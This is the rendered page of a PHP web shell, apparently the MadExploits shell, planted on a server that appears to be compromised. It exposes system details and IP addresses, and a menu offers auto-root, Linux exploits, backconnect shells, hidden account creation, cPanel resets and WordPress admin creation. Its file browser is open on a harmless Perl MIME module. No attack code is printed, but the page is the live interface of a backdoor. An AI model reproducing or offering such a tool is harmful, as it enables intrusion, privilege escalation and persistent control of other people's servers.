Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
MIME /
Field /
[ HOME SHELL ]
Name
Size
Permission
Action
ConTraEnc.pm
1.32
KB
-rw-r--r--
ContDisp.pm
1.2
KB
-rw-r--r--
ContType.pm
4.62
KB
-rw-r--r--
ParamVal.pm
9.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ConTraEnc.pm
package MIME::Field::ConTraEnc; =head1 NAME MIME::Field::ConTraEnc - a "Content-transfer-encoding" field =head1 DESCRIPTION A subclass of Mail::Field. I<Don't use this class directly... its name may change in the future!> Instead, ask Mail::Field for new instances based on the field name! =head1 SYNOPSIS use Mail::Field; use MIME::Head; # Create an instance from some text: $field = Mail::Field->new('Content-transfer-encoding', '7bit'); # Get the encoding. # Possible values: 'binary', '7bit', '8bit', 'quoted-printable', # 'base64' and '' (unspecified). Note that there can't be a # single default for this, since it depends on the content type! $encoding = $field->encoding; =head1 SEE ALSO L<MIME::Field::ParamVal>, L<Mail::Field> =head1 AUTHOR Eryq (F<eryq@zeegee.com>), ZeeGee Software Inc (F<http://www.zeegee.com>). David F. Skoll (dfs@roaringpenguin.com) http://www.roaringpenguin.com =cut require 5.001; use strict; use MIME::Field::ParamVal; use vars qw($VERSION @ISA); @ISA = qw(MIME::Field::ParamVal); # The package version, both in 1.23 style *and* usable by MakeMaker: $VERSION = "5.505"; # Install it: bless([])->register('Content-transfer-encoding'); #------------------------------ sub encoding { shift->paramstr('_', @_); } #------------------------------ 1;
Close